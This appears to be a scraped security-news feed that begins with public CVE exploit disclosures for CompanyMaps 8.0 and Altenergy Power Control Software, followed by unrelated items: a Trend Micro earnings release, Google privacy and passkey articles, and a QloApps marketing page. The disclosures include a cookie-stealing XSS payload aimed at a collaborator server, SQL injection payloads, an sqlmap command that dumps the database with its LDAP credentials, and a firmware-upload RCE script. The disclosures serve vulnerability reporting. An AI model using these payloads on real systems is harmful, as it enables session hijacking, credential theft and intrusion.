Cross Site Scripting vulnerability found in Maximilian Vogt cmaps v.8.0 allows a remote attacker to execute arbitrary code via the auditlog tab in the admin panel.

# Exploit Title: Stored Cross Site Scripting# Google Dork:# Date: 27.04.2023# Exploit Author: Lucas Noki (0xPrototype)# Vendor Homepage: https://github.com/vogtmh# Software Link: https://github.com/vogtmh/cmaps# Version: 8.0# Tested on: Mac, Windows, Linux# CVE : CVE-2023-29983*Steps to reproduce:*1. Clone the repository and install the application2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token=3. The payload used is: <script>new+Image().src=`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}`</script>4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough.5. Login into the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog6. Check your collaborator server. You should have a request where the admins cookie is the value of the c parameterIn a real world case you would need to wait for the admin to log into the application and open the auditlog tab.Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.

CVE-2023-29983: CompanyMaps 8.0 Cross Site Scripting ≈ Packet Storm

Cross Site Scripting (XSS) vulnerability in vogtmh cmaps (companymaps) 8.0 allows attackers to execute arbitrary code.

# Exploit Title: Reflected Cross Site Scripting- Google Dork:- Date: 27.04.2023- Exploit Author: Lucas Noki (0xPrototype)- Vendor Homepage: https://github.com/vogtmh- Software Link: https://github.com/vogtmh/cmaps- Version: 8.0- Tested on: Mac, Windows, Linux- CVE : CVE-2023-29808*Description:*The vulnerability found is Reflected Cross Site Scripting. When the `/index.php?map=overview&findme=` endpoint is hit with a request where the "findme" parameter contains a malicious payload we have the possibility to perform an XSS attack. This happens because the input isn't sanitized.*Steps to reproduce:*1. Clone the repository and install the application2. Send a maliciously crafted payload via the "findme" parameter to the following endpoint: /index.php?map=overview&findme=3. The payload used is: ";alert(document.cookie)//4. Simply visiting the complete URL: http://IP/index.php?map=overview&findme=";alert(document.cookie)// is enough. Now an alertbox should pop up with your current cookie value. <img src="Screenshot 2023-05-03 at 17.56.59.png" alt="Screenshot 2023-05-03 at 17.56.59" style="zoom:50%;" />Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.

CVE-2023-29808: Companymaps 8.0 Cross Site Scripting ≈ Packet Storm

SQL injection vulnerability found in Maximilian Vogt companymaps (cmaps) v.8.0 allows a remote attacker to execute arbitrary code via a crafted script in the request.

# Exploit Title: Unauthenticated SQL injection 
- Google Dork: 
- Date: 27.04.2023 
- Exploit Author: Lucas Noki (0xPrototype) 
- Vendor Homepage: https://github.com/vogtmh 
- Software Link: https://github.com/vogtmh/cmaps 
- Version: 8.0 
- Tested on: Mac, Windows, Linux 
- CVE : CVE-2023-29809

*Description:*

The vulnerability found is an SQL injection. The `bookmap` parameter is vulnerable. When visiting the page: http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test we get the normal JSON response. However if a single quote gets appended to the value of the `bookmap` parameter we get an error message: 
```html 
Warning: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in /var/www/html/rest/booking/index.php on line 152 
```

Now if two single quotes get appended we get the normal response without an error. This confirms the opportunity for sql injection. To really prove the SQL injection we append the following payload: 
``` 
'-(select*from(select+sleep(2)+from+dual)a)--+ 
```

The page will sleep for two seconds. This confirms the SQL injection.

*Steps to reproduce:*

1. Send the following payload to test the vulnerability: ```'-(select*from(select+sleep(2)+from+dual)a)--+```

2. If the site slept for two seconds run the following sqlmap command to dump the whole database including the ldap credentials. 
 ```shell 
 python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump 
 ```

Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.

## Request to the server:

<img src="Screenshot 2023-04-30 at 22.23.51.png" alt="Screenshot 2023-04-30 at 22.23.51" style="zoom:50%;" />

## Response from the server:

Look at the response time.

<img src="Screenshot 2023-04-30 at 22.24.35.png" alt="Screenshot 2023-04-30 at 22.24.35" style="zoom:50%;" />

CVE-2023-29809: Companymaps 8.0 SQL Injection ≈ Packet Storm

Altenergy Power Control Software C1.2.5 was discovered to contain a remote code execution (RCE) vulnerability via the component /models/management_model.php.

**title : insufficient verification of firmware integrity "Altenergy Power Control Software" led to RCE****SW ver: C1.2.5****Vendor: https://apsystems.com/****Google Dork: intitle:"Altenergy Power Control Software"****Affected device: ENERGY COMMUNICATION UNIT**

**POC Video :**

**vulnerable code :**

"/home/local\_web/pagesapplication/models/management\_model.php"

 public function exec\_upgrade\_ecu()
 {
 $results = array();
 $res\_array = array();

 exec("rm -rf /tmp/update\_localweb/");
 if ($\_FILES\["file"\]\["error"\] > 0)
 {
 array\_push($res\_array, "Return Code: " . $\_FILES\["file"\]\["error"\] . " ");
 $results\["value"\] = 1;
 }
 else
 {
 array\_push($res\_array, "Upload: " . $\_FILES\["file"\]\["name"\] . " ");
 array\_push($res\_array, "Type: " . $\_FILES\["file"\]\["type"\] . " ");
 array\_push($res\_array, "Size: " . ($\_FILES\["file"\]\["size"\] / 1024) . " Kb ");
 array\_push($res\_array, "Temp file: " . $\_FILES\["file"\]\["tmp\_name"\] . " "); 

 move\_uploaded\_file($\_FILES\["file"\]\["tmp\_name"\], "/tmp/" . $\_FILES\["file"\]\["name"\]);
 array\_push($res\_array, "Stored in: " . "/tmp/" . $\_FILES\["file"\]\["name"\]);
 exec("tar xjvf /tmp/".$\_FILES\["file"\]\["name"\]." -C /tmp");
 exec("ls /tmp/update\_localweb/assist", $temp, $value);
 exec("/tmp/update\_localweb/assist &");
 $results\["value"\] = $value ? 1 : 0;
 }

 $results\["result"\] = implode("\\n",$res\_array);
 return $results;
 }

**Exploit :**

exploit.sh

#!/bin/bash
mkdir update\_localweb 2>/dev/null
payload='ping -c 1 ahvmb8ham4hkik6ifzt7o8puyl4hs6.burpcollaborator.net'
echo $payload \> update\_localweb/assist
chmod 777 update\_localweb/assist
tar cjvf b4db0t.bin update\_localweb/
rm -rf update\_localweb 

Browse to http://<IP\_ADDR>/index.php/management/upgrade\_ecu and upload b4db0t.bin POC :

CVE-2023-31502: Disclosures/Insufficient_Verification_of_Data_Authenticity.MD at main · ahmedalroky/Disclosures

**TOKYO****,** **May 11, 2023** **/PRNewswire/ --** Trend Micro Incorporated (TYO: 4704;TSE: 4704), a global cybersecurity leader, today announced earnings results for the first quarter of fiscal year 2023, ending March 31, 2023 by reporting 16% year-over-year growth. 

Trend Micro's business resilience continues to be achieved by diversifying between both enterprise and consumer customers spanning more geographies than any pure play cybersecurity company. With a singular focus on cybersecurity, these results were powered by a customer base of over 500,000 organizations across more than 175 countries.  

As the growth engine for the company, the enterprise customer segment grew 20% YoY net sales at actual currency driven by a 9% increase in SaaS deployments globally. Enterprise ARR increased by 25% YoY totaling more than US $692 at the company's internal plan exchange rate. The company protects over 68 million enterprise assets at a growth rate of 29% YoY.

As the value engine for the company, Trend continued to invest in its consumer business growing across all geographies at 6% YoY net sales at actual currency.

"We too see the economy impacting markets and expect this to continue for the remainder of the year despite cybersecurity being identified as a critical priority," said Trend Micro CEO and co-founder Eva Chen. "Organizations worldwide are tightening budgets and prioritizing vendors who understand and ease the pressures of the security operations center. We proudly empower every organization to thrive in a world with less risk."

For this quarter, Trend Micro posted consolidated net sales of 58,704 million Yen (or US $443 million, 132.40 JPY \= 1USD). The company posted operating income of 9,548 million Yen (or US $72 million) and net income attributable to owners of the parent of 6,374 million Yen (or US $48 million) for the quarter.

The company will not revise expected consolidated results for the full fiscal year ending December 31, 2023 (released on February 16, 2023). Based on information currently available to the company, consolidated net sales for the year ending December 31, 2023 is expected to be 248,500 million Yen (or US $1,840 million, based on an exchange rate of 135 JPY \= 1 USD). Operating income and net income are expected to be 34,800 million Yen (or US $257 million) and 25,100 million Yen (or US $185 million), respectively.

**Key Business Updates in Q1 2023**

**Innovative**: Trend nurtures a culture of innovation to drive advancements across its cybersecurity platform.

*   Acquired SOC experts Anlyz to extend its orchestration, automation and integration capabilities for the Trend Vision One platform and empower Managed Security Service Providers to improve operational efficiencies, cost effectiveness and security outcomes.
*   Launched a new incubation project as a subsidiary of Trend Micro, focused on combating emerging threats in the private 5G networks.

**Trusted**: Trend is a trusted partner to the customers and communities that it serves.

*   Disclosed newest ransomware survey that revealed how decision makers can leverage operational changes to collectively help drive down ransomware profitability.
*   Announced that the Trend Micro Zero Day Initiative's (ZDI's) Pwn2Own bug bounty competition will add a contest to secure connected vehicle ecosystems.
*   Conducted two Pwn2Own competitions in Q1 which collectively awarded over US $1 Million to external researchers who discovered over 50 unique zero-days, including the first-time generative AI like ChatGPT was used to detect a vulnerability.

**Global**: Trend has the most geographically diverse customers in the industry, with millions of sensors powering the Trend Vision One platform for superior attack surface risk management.

*   Released a global study revealing that while global organizations plan to increase cybersecurity budgets in 2023, while business leaders hold conflicting views on functions.
*   Established a new research and development center in Bangalore, India, with more than 40 technical employees, expanding its worldwide engineering team of over 3000.

**New Patents Filed**

Trend Micro was awarded the following patents in Q1 2023:

**Notice Regarding Forward-Looking Statements**

Certain statements included in this press release that are not historical facts are forward-looking statements. Forward-looking statements are sometimes accompanied by words such as "believe," "may," "will," "estimate," "continue," "anticipate," "intend," "expect," "should," "would," "plan," "predict," "potential," "seem," "seek," "future," "outlook" and similar expressions that predict or indicate future events or trends or that are not statements of historical matters. These statements are based on our current expectations and beliefs and are subject to a number of factors and uncertainties that could cause actual results to differ materially from those described in the forward-looking statements. Although we believe that the expectations reflected in our forward-looking statements are reasonable, we do not know whether our expectations will prove correct. You are cautioned not to place undue reliance on these forward-looking statements, which speak only as of the date hereof, even if subsequently made available by us on our website or otherwise. We do not undertake any obligation to update, amend or clarify these forward-looking statements, whether as a result of new information, future events or otherwise, except as may be required under applicable securities laws.

**About Trend Micro**

Trend Micro, a global cybersecurity leader, helps make the world safe for exchanging digital information. Fueled by decades of security expertise, global threat research, and continuous innovation, Trend Micro's cybersecurity platform protects hundreds of thousands of organizations and millions of individuals across clouds, networks, devices, and endpoints. As a leader in cloud and enterprise cybersecurity, the platform delivers a powerful range of advanced threat defense techniques optimized for environments like AWS, Microsoft, and Google, and central visibility for better, faster detection and response. With 7,000 employees across 65 countries, Trend Micro enables organizations to simplify and secure their connected world. www.trendmicro.com.

SOURCE Trend Micro Incorporated

Trend Micro Reports Consistent Earnings Results for Q1 2023

By Deeba Ahmed
Google said that with its dark web monitoring feature, not only will users be able to check their…
This is a post from HackRead.com Read the original post: Google offers Dark Web monitoring for US Gmail users

**Google said that with its dark web monitoring feature, not only will users be able to check their email addresses on the dark web, but they will also receive advice on improving their online security.**

Google has added the dark web report security feature to its security tools. This feature is offered to all Gmail users in the USA, using which they can check if their email address is published on the dark web.

The search engine giant will soon expand this feature to selected foreign markets. Jen Fitzpatrick, Google’s core services SVP, stated that since March 2023, this feature was available only to Google One subscribers in the US, and now its scope is being expanded.

“Previously only available to Google One subscribers in the US, we’re expanding access to our dark web report in the next few weeks, so anyone with a Gmail account in the US will be able to run scans to see if your Gmail address appears on the dark web and receive guidance on what actions to take to protect yourself.”

Image: Google

**How Will it Improve Data Protection?**

As far as the new dark web monitoring feature is concerned, Google has explained that not only will users be able to check their email addresses on the dark web but will also receive advice on improving their online security. Chrome browser already features a built-in password manager, which helps them keep their data protected.

Using this feature, Gmail users can take their data protection a step ahead with guidance from Google, such as enabling 2FA protection to prevent their accounts from hijacking.

Moreover, Google will notify Gmail users whenever they need to check if their email address is part of any data breaches and may end up on the dark web. This data can end up on the dark web through data breaches suffered by platforms or services a user has subscribed for. It is then sold to cybercriminals who use it for conducting identity theft, phishing scams, and banking fraud.

**What Information can be Checked?**

According to Google, the report generated through this feature will inform the user about the presence of their personal data such as their name, email address, physical address, contact information, and Social Security Number.

The user will be promptly notified if the data is found. If you are a Google One subscriber, you can enable this feature after creating a monitoring profile and clicking Setup> Dark Web Report> Start monitoring.

**When was it Announced?**

The new feature was announced at the Google I/O annual developer conference and will be rolled out within a few weeks. At the conference, the company also confirmed introducing many new security features to improve its products and services protections. This includes adding spam protection to Google Drive and allowing users to delete search history in Google Maps.

1.  The 5 Best Cloud Performance Monitoring Tools
2.  Firefox Monitor tool informs users if they’ve been hacked
3.  Google will ‘auto-delete’ your location & web activity data
4.  On Dark Web Facebook ID is worth $5.20 & Gmail ID is $1

Google offers Dark Web monitoring for US Gmail users

Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.

**All Features**

 

**Launch Hotel Booking Website**

Launch an attractive and user-friendly online hotel booking system in a few seconds

 

**Tax Management**

With QloApps Tax Management, you can manage all types of taxes easily and smoothly

 

**Partial Payment Booking**

Customers can book rooms with partial payment with the QloApps hotel management software

 

**Integrated Payment Gateway**

QloApps supports all the payment gateways. Paypal is integrated by default in QloApps hotel software

 

**Multiple Languages and Currencies**

QloApps supports multiple languages and currencies. You can attract customers from any part of the globe

 

**Instant Email Notification**

Engage and retain your customer by instant email notifications and by sending them regular updates

 

**Manage Offline Booking**

Not only online, with QloApps hotel booking software, you can also manage offline or on-desk bookings

 

**Search Engine Optimization**

SEO increases the visibility of your hotel booking website in search engines

QloApps have fascinating features that enhance the online booking system. All these features help to improve user experience. Check out more

View all Features

**Marketplace**

**Launch Marketplace**

Launch your hotel marketplace and work as an online travel agency and earn a commission.

**Get More Hoteliers**

The QloApps Marketplace allows you to add as many hoteliers as you want. Those hotelier can add any number of hotels with any number of rooms.

**Earn Commission**

You can apply a different commission rate for different sellers. Then on their successful bookings earn your desired commission.

> Convert your hotel website into a marketplace of hotels and work as an online travel agency (OTA). Allow multiple vendors, hoteliers or property owners to list their properties/ hotels on your website and earn commission on their bookings.
> 
> Read More

**Add-Ons/Extensions**

Explore all the QloApps add-ons and find the best that suits your needs. Here you will find all the addons from the QloApps team.

QloApps PayPal Checkout

Allow your users to make online payments via the PayPal payment gateway. Your website users will be able to make payments to book rooms via Debit Cards, Credit Cards and PayPal accounts.

Know more

QloApps Hotel Virtual Tour

Allow your users to visit your property virtually. This addon will create a virtual tour of your hotel property so that the user can interact with it and checkout your hotel before booking it.

Know more

QloApps Front Desk System

Add a calendar to your dashboard with all booking information. This add-on will allow the admin to keep an eye on his bookings, check-ins, and check-outs from a single interface at the backend. The admin can also create a booking.

Know more

QloApps Tours and Packages

Sell tours and packages from your website. This addon will add the capability to create tours with full itenery and take the booking for the whole package. This addon will add a new dimension to your hotel business.

Know more

QloApps AMP(Accelerated Mobile Pages)

Create AMP pages of your hotel booking website. QloApps AMP is very vital for your website's SEO and overall user experience. It will decrease the load time while maintaining the performance.

Know more

QloApps Advanced Progressive Web App

Get the functionality of web app and push notifications. QloApps PWA will allow your users to install the web app of your website on their desktop and mobile devices. It will also give you the option to send 5 different types of notifications.

Know more

QloApps GDPR Compliance

Comply with new regulations: GDPR & European Union cookie law and ensures your customers of data protection. You can allow your customers to update or delete their personal data present on the website whenever they want.

Know more

QloApps Marketplace

Convert your website into a marketplace of hotels and launch your Online Travel Agency. Admin can grant access to Sellers/Hoteliers to add and sell hotel rooms and earn a commission for bookings made by customers through the website.

Know more

QloApps Myallocator Connector

Seamlessly connects QloApps with Myallocator channel manager to synchronize room inventory and rates of room types for various hotel properties.

Know more

We have multiple add-ons that help to increase the functionality of the online hotel reservation system. Check out the QloApps addon

View all Add-Ons

**Channel Manager**

> With QloApps Channel Manager you will be able to synchronize all your hotel listings from a single platform. Syncronize your rates, inventories, and bookings to avoid under bookings, overbookings and price mismanagement.
> 
> Read More

**Multi Channel  
Integration**

Our channel manager is integrated with multiple online travel agencies for centralized data management.

**Manage Prices & Inventory**

Update Prices and Room Inventory across various online travel agencies (OTAs) through single platform in real time.

**Manage Channels  
Bookings**

Inventories are managed on all channels when booking comes from any channel to avoid overbookings.

**Manage Multiple  
Hotels**

Our Channel Manager provides you an intuitive user-friendly Interface to easily manage multiple hotels.

**Cloud Hosting**

Host your QloApps hotel website on world's best Cloud Infrastructure Provider AWS (Amazon Web Services) and get 1 Year Free Hosting services Under AWS free tier plan. You also have the option to host your hotel website on GCP (Google Cloud Platform)

Secure System for your hotel booking website

Increase number of bookings with faster service

**Our Partners**

A single effort may fail but a collective effort is the guarantee of success. Your contribution can be of great significance. Our partnership should aim the mutual benefits and the benefit of the community. So let us make the Hospitality Industry great together.

BECOME A PARTNER

**Contribution to Open Web**

Community contributions are the heart of any open-source project's success. QloApps is a free hotel management software and a true open-source project serving the hotel industry. We invite you to make contributions to QloApps so that we can together serve the cause.

**We Got Featured !**

QloApps got mentioned and listed on various platforms. You can find us here.

**What our clients think about us!**

Meet our valuable clients and learn about their experiences with us.

**Pamela Payne**

“We are very satisfied with the flexibility of additional implementation and raw design for our esoteric and untried ideas of QloApps. We enjoy the time that our account manager spends to further explain capabilities and creative solutions. Bahayan is building a complete system with WebKul and QloApps with a good amount of ease and a great deal of cost savings.”

**Amir Atzmoni**

“We have been working with QloApps since 2019 on unique IT project. Their expertise and professionalism were evident throughout the development cycle, and we were very pleased with the final product. We have already completed two major releases with QloApps and are delighted with their services. They have shown enormous skill and vast domain knowledge and their IT expertise is reliable and trustworthy. We would recommend QloApps to anyone looking for quality IT and development services, delivered in a professional manner.”

**Josef Rufuma**

“I would like to say thank you for your good effort and support we have been receiving when working on our e commence software. when we request for support we receive the reply from you within hours and we receive a technical solution within hours or few days. your staff are very friendly to us.we look forward to continue working with you on our project. We thank you for the incredible services and amazing customer support you provide to us.”

**Juliane Drevitson**

“We've had a very positive experience so far with QloApps. Our project is a very complex one involving tons of modifications that are required to accommodate our unique business model and we feel that the reps have taken the time to really understand our business in order to customize the website to meet our needs. QloApps seems to be very flexible and user friendly which is why we are excited to begin using it!”

**Shai Diai**

“We thank QloApps for the wonderful job in helping us develop our program. Everyone was professional, excellent and hard working. Thanks to them, we were able to achieve our goal on time, and we look forward to continuing working with them in the future. ”

**Manoj Singh**

“It has been a positive experience to work with QloApps. It has turned out to be the most suitable match for our requirements. With a few customizations, we have been able to use QloApps to tailor-fit to our needs. I feel confident that the customized QloApps will deliver the value we are seeking from this solution.”

**To know how hotel management software is beneficial for you watch this video**

Watch Our Teaser Video

**Feature Suggestion**

Our aim is to help our users to attain what they desire. So we like to hear it from you. Please suggest a feature which you feel should be there in QloApps.

CVE-2023-30256: Open Source and Free Hotel Booking Management Software | QloApps

Categories: News
Categories: Personal
Categories: Privacy
Google used its annual I/O conference keynote to announce anti-stalking updates.



(Read more...)




The post Google adds unwanted tracker detection to Find My Device network appeared first on Malwarebytes Labs.

Last week we reported that Google and Apple were looking for input on a draft specification to alert users in the event of suspected unwanted tracking. Apple and Google said other tracker makers like Samsung, Tile, Chipolo, eufy Security, and Pebblebee have expressed interest in their draft.

Now, Google has used its annual I/O conference keynote to announce updates to its Find My Device network aimed at stopping unwanted tracking by devices with built-in location-tracking capabilities. Examples of these accessories are the Apple AirTag, Tile Mate and Pro, Samsung SmartTag, and Google’s expected Grogu.

The basic principle of these tags is that anyone with the matching app and permissions on their device (usually a phone) contributes to find the last location where the tag was detected. The idea is that you attach a tag to the objects you are afraid of misplacing or losing, such as your keys or your laptop, or even you car, and when you need to find the object you can look in the app and see where it last made contact with a device. This type of contact is usually made over Bluetooth.

After several complaints and reports that these tracking devices were used to track people rather than finding lost objects, some states introduced bills to ban the use of trackers to aid stalking. But while a bill can deter, it doesn’t stop people with criminal intentions directly. Nor do these bills stop the car thieves that planted AirTags on expensive cars, so they could find the cars at home where they were less well protected.

The new features of the Find My Device network allow Android users to find more devices. The update, which is expected this summer, will also alert users about trackers that are registered to another user, but still look like they are following you around.

This could happen if a criminal planted a tag on your laptop so they could track its location. If you keep your laptop close, the tag will stand out, because it does not belong to you but stays in your neighborhood anyway. With the expected Android update, any tracker compatible with the Find My Device network will show up on your app.

If an alert is received from a tracker other than your own, you can then locate the device. These warnings can eventually be expected to work on both Android and Apple devices.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Google adds unwanted tracker detection to Find My Device network

Categories: News
Tags: Google passkey

Tags:  passkey

Tags:  passwordless future

Tags:  passwordless

Tags:  phishing

Google is offering users the best option to date to securing their accounts from phishing. (Hint: It's not passwords.)



(Read more...)




The post Google Passkeys: How to create one and when you shouldn't appeared first on Malwarebytes Labs.

Google has just brought users closer to a passwordless future.

In a recent blog post, the tech giant introduced the option to create and use a safer, more convenient alternative to passwords: Passkeys, a form of digital credential. So, how do they work?

Passkeys are generated using public-key cryptography, or asymmetric encryption, which involves using a pair of public and private keys. The public key is stored on the side of the app or website, while the private key, a main component of the passkey, is stored on the device. Websites have no access to the value of the passkey. When a Google user logs in to their account using a passkey, Google checks if the website has a corresponding public key.

This method of authentication makes accounts significantly more resilient, because, unlike a password, the key can't be phished, stolen from the website it's stored on, or intercepted in transit. It also means the account cannot be subject to an attack as a result of a weak password or password re-use, because there is no password.

As the authors of the blog put it:

> "Using passwords puts a lot of responsibility on users. Choosing strong passwords and remembering them across various accounts can be hard. In addition, even the most savvy users are often misled into giving them up during phishing attempts. 2SV (2FA/MFA) helps, but again puts strain on the user with additional, unwanted friction and still doesn’t fully protect against phishing attacks and targeted attacks like 'SIM swaps' for SMS verification. Passkeys help address all these issues."

The blog authors identified some benefits users could get out of using Google passkeys:

*   **Guaranteed access.** Suppose you created a passkey on a Google account you access with your smartphone. In that case, you can use this passkey to access that Google account on other devices like a laptop. Synchronizing the passkey to the device isn't needed as long as the phone is near the device and you approve the sign-in on your phone. If you create a passkey for your laptop—or for each device you own—you won't need your phone anymore to access your Google account.
*   "**Backup" key.** Some platforms securely back up your passkeys and sync them with other devices. For example, a passkey created on your iPhone will also be available on your other Apple devices if you're logged in to the same iCloud account. This prevents a user from getting locked out if they lose a device. Passkeys also make upgrading to a new device easier, as you only need to sync it with the rest of your devices.
*   **Phishing and breach protection.** Because passkeys cannot be stolen, phishers won't be able to get their hands on your account credentials. Similarly, passkeys cannot be reused or exposed in a data breach.
*   **It can replace physical security keys.** Google said that passkeys are "strong enough that they can stand in for security keys for users." A security key is a physical device used to sign in to your accounts. Like passkeys, it's another passwordless method of authentication. An example of a security key is YubiKey.

It's worth noting that passkeys use the three common types of information used in MFA: Something you have (like a smartphone), something you are (your biometrics), or something you know (like a PIN or pattern). This makes passkeys a form of MFA. However, according to the FIDO Alliance, some regulatory bodies have yet to make this recognition, something the alliance is already actively working towards.

**Minimum hardware and software requirements**

Google has listed what you'll need in order to create a passkey: Windows 10 or macOS Ventura (or later) running Chrome 109, Safari 16, or Edge 109 (or later), or iOS16 or Android 9 (or later) on a mobile device.

You also need to enable screen lock, especially Bluetooth, if you want to use passkeys on the phone to sign in to another device.

**When you _shouldn't_ create a passkey**

Passkeys should only be created on devices you personally control. That said, you shouldn't make a passkey using a Google Workspace account through a school or employer. You also shouldn't create one on devices you share with other people, like your family computer, as anyone using the device will have access to your Google account. Even if you sign out of your account, once a passkey is created on that device, anyone who can unlock the device can sign in back into your account with the passkey.

**How to create a passkey in two simple steps**

I used an iOS device here.

1\. Go to g.co/passkeys to trigger the process.

You can also log in to your Google account. From the **Home** page, go to **Security**. Scroll down to **How you sign in to Google** and pick **Passkeys** as an added sign-in option. You'll land on the same page as above.

2\. Click **Create a passkey**. An overlay will display, confirming that you can create a passkey on the device. Click **Continue**.

Note: If you have your **iCloud Keychain** disabled, your device will prompt you to enable it.

And you're done!

The first time you sign in, the computer displays a QR code you can scan with your mobile device's camera. Once signed in, you may be prompted to create a passkey for the computer. As we've said, only agree if you don't share the computer with anyone.

If in the future, you decide to stop using passkeys, Google gives you the option to remove them. You can also opt out of using passkeys entirely. In cases when devices have been lost or stolen, or the passkey goes missing or unavailable, you can check Google's recommendations on this Account Help page.

Google isn't the only company that has been working on an alternative to passwords. Apple and Microsoft have also announced they'll support passkeys on their respective platforms to address password problems. 

Watch this space!

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Google Passkeys: How to create one and when you shouldn't

Google unveiled a slew of new privacy, safety, and security features today at its annual developer conference, Google I/O. The tech giant's latest initiatives are aimed at protecting its users from cyber threats, including phishing attacks and malicious websites, while providing more control and transparency over their personal data.
Here is a short list of the newly introduced features -

Privacy / Safety / Security

Google unveiled a slew of new privacy, safety, and security features today at its annual developer conference, Google I/O. The tech giant's latest initiatives are aimed at protecting its users from cyber threats, including phishing attacks and malicious websites, while providing more control and transparency over their personal data.

Here is a short list of the newly introduced features -

*   Improved data control and transparency
*   Gmail Dark Web Scan Report
*   Effortlessly Delete Maps Search History
*   AI-Powered Safe Browsing
*   Content Safety API Expansion
*   About this Image
*   Spam View in Google Drive

Among the newly introduced features, the first on the list is improved data control and transparency. Google has unveiled an update for its Android operating system that allows users to better control location sharing through apps installed on their devices.

"Starting with location data, you will be informed in permission requests when an app shares your information with third-parties for advertising purposes," Jen Fitzpatrick, senior vice president of core systems and experiences, said.

"You can use this information to decide if you want to approve or decline location sharing for each app so you're always in control."

In addition, the company said it's expanding dark web reports to all users with a Gmail account in the U.S. to alert if their sensitive data is circulating on sites not indexed by search engines.

The feature, which was initially made available to Google One subscribers in March 2023, makes it possible to scan the dark web for personally identifiable information such as names, addresses, emails, phone numbers, and Social Security numbers, and seek appropriate guidance.

A third privacy-focused option launched by the tech giant is the ability to delete recent searches from Maps with a single tap as opposed to removing the Maps search history from Web & App Activity.

Other notable features include a new Safe Browsing API and a Spam view in Google Drive that's analogous to Gmail and automatically segregates potentially harmful files or abusive content, which can then be reviewed by users.

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

The search behemoth further said it's expanding its Content Safety API to flag child sexual abuse material (CSAM) in video content, alongside debuting an "About This Image" tool that offers users with more context to ensure reliable access to trustworthy information.

"'About this Image' provides you with important context like when an image or similar images were first indexed by Google, where it may have first appeared, and where else it's been seen online like a news, social or fact checking site," Fitzpatrick said.

The updates come a week after Google enabled passwordless sign-ins using passkeys across Google Accounts on all platforms.

Last month, the tech giant also enacted a new data deletion policy that requires app developers to offer a "readily discoverable option" to users from both within an app and outside of it.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google